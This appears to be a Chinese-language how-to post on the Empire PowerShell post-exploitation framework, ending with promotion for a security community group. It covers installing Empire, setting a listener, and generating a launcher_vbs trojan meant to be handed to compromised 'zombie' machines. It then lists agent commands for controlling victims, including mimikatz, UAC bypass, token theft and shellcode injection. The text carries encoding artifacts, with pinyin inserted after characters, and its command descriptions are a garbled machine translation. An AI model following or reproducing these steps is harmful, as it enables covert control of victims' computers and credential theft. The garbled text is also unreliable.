1、Empire工具介紹
Empire是一個(gè)PowerShell后期漏洞利用代理工具同時(shí)也是一款很強(qiáng)大的后滲透測神器,它建立在密碼學(xué)、安全通信和靈活的架構(gòu)之上。Empire實(shí)現(xiàn)了無需powershell.exe就可運(yùn)行PowerShell代理的功能。快速部署后期漏洞利用模塊,從鍵盤記錄器到Mimikatz,并且能夠適應(yīng)通信躲避網(wǎng)絡(luò)檢測,所有的這些功能都封裝在一個(gè)以實(shí)用性為重點(diǎn)的框架中
2、Empire工具安裝
雖然滲透的目標(biāo)是windows,但Empire本身應(yīng)該是運(yùn)行在linux平臺(tái)的,首先把程序目錄下載下來:
git clone EmpireProject/Empire
接著就轉(zhuǎn)進(jìn)”Empire/setup”目錄,安裝./install.sh。
sudo ./install.sh
3、Empire工具的攻擊利用
執(zhí)行 sudo ./empire #執(zhí)行工具操作
執(zhí)行 listeners #進(jìn)入監(jiān)聽列表
如果出現(xiàn)[!] Invalid listener name 那么先執(zhí)行 uselistener http 選擇http模塊 再執(zhí)行info 即可, 跳出就back
直接命令
set Name hacker
set Host http://192.168.1.14:443
設(shè)置完之后:
然后執(zhí)行: run #運(yùn)行監(jiān)聽。 運(yùn)行監(jiān)聽之后生成木馬。 如果沒有run 命令就用 execute 取代run命令
執(zhí)行:usestager 空格 然后Tab按鍵 會(huì)出現(xiàn)
bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy
Windows 就選擇 launcher_bat launcher_vbs 等。。 PHP 就選擇 hop_php
比如我選擇: launcher_vbs
執(zhí)行:usestager launcher_vbs 監(jiān)聽列表的名字 #這里就是hacker, hacker就是我剛剛設(shè)置的監(jiān)聽列表名字 (set Listener hacker)
然后執(zhí)行:info 查看設(shè)置配置,木馬腳本放在了 /tmp/launcher.vbs
然后執(zhí)行:execute #運(yùn)行 生成木馬,生成成功 然后執(zhí)行: sudo chmod 777 /tmp/launcher.vbs #賦予可讀可寫權(quán)限 然后丟給肉雞運(yùn)行
生成成功
然后查看肉雞列表 執(zhí)行命令: agents PS:如果你exit了 也就是退出了 你也可以直接執(zhí)行agents命令查看肉雞列表
如果要控制肉雞的話:
就執(zhí)行: interact 肉雞的名字
進(jìn)入之后 執(zhí)行幫助 help 查看 肉雞控制器的命令
agents 跳躍的代理人的菜單
back 返回菜單
bypassuac 運(yùn)行bypassuac,開創(chuàng)一個(gè)新的高完整性為監(jiān)聽代理。產(chǎn)卵<監(jiān)聽器>
clear 清除代理任務(wù)。
creds 從數(shù)據(jù)庫顯示/返回憑證。
download 任務(wù)代理下載文件
exit 任務(wù)代理退出
help 顯示菜單或語法for the help特定的命令。
info 顯示有關(guān)此代理的信息
injectshellcode listener shellcode inject進(jìn)入偏遠(yuǎn)的過程。前l(fā)istener米。injectshellcode<><>_ PID
jobs 返回工作或殺死一個(gè)正在運(yùn)行的工作
kill 任務(wù)殺死特定進(jìn)程名稱或ID.的代理
killdate 獲取或設(shè)置一個(gè)代理的killdate(01 / 01 / 2016)。
list 列出所有活動(dòng)代理(或偵聽器)
listeners 跳轉(zhuǎn)到監(jiān)聽器菜單
lostlimit 任務(wù)代理更改丟失代理檢測的限制
main 回到主菜單
mimikatz 運(yùn)行在客戶端- mimikatz Invoke
psinject inject發(fā)射器向遠(yuǎn)程進(jìn)程。例如,psinject > <名> < PID
pth 執(zhí)行一個(gè)credid PTH通過Mimikatz。
rename 重命名代理
revtoself 使用憑證/令牌還原令牌權(quán)限。
sc 需要截圖,默認(rèn)是PNG。給一個(gè)比率意味著使用JPEG。例SC [ 1 ]
scriptcmd 執(zhí)行在目前進(jìn)口PowerShell腳本函數(shù)。
scriptimport 進(jìn)口的PowerShell腳本保存在存儲(chǔ)器中的代理。
searchmodule 模塊搜索帝國名稱/描述。
shell 使用shell命令的代理任務(wù)。
sleep 任務(wù)代理睡眠間隔[抖動(dòng)]
spawn 對(duì)于給定的聽眾產(chǎn)生一個(gè)新的帝國代理名稱。產(chǎn)卵<監(jiān)聽器>
steal_token 使用憑據(jù)/代幣冒充一個(gè)令牌的進(jìn)程ID。
sysinfo 任務(wù)獲取系統(tǒng)信息的代理
updateprofile 更新代理連接配置文件
upload 任務(wù)代理上傳文件
usemodule 使用一個(gè)帝國的PowerShell模塊
workinghours 獲取或設(shè)置一個(gè)代理的工作時(shí)間
執(zhí)行肉雞命令: shell 你想執(zhí)行的系統(tǒng)命令
三、結(jié)束攻擊
如果你想刪除肉雞:
執(zhí)行:agents #查看肉雞列表
執(zhí)行:remove 肉雞名字
如果你想關(guān)閉監(jiān)聽:
首先執(zhí)行: listeners 查看監(jiān)聽列表
然后執(zhí)行: kill 監(jiān)聽列表的名字 結(jié)束掉進(jìn)程
最后喜歡我文章的朋友請(qǐng)加圈子關(guān)注我們,私信關(guān)鍵詞:加群。(送免費(fèi)資料和優(yōu)惠券)
就會(huì)自動(dòng)分享給你群號(hào)。歡迎大家加入我們的安全大家庭。提高大家的安全意識(shí),提升大家的網(wǎng)絡(luò)安全技能一直是我們的初衷和愿景,讓我們共同成為守護(hù)信息世界的"SaFeMAN"。
還有可以關(guān)注我們微信公眾號(hào),在公眾號(hào)上輸入安界網(wǎng),就可以關(guān)注到我們,領(lǐng)取資料和優(yōu)惠券!






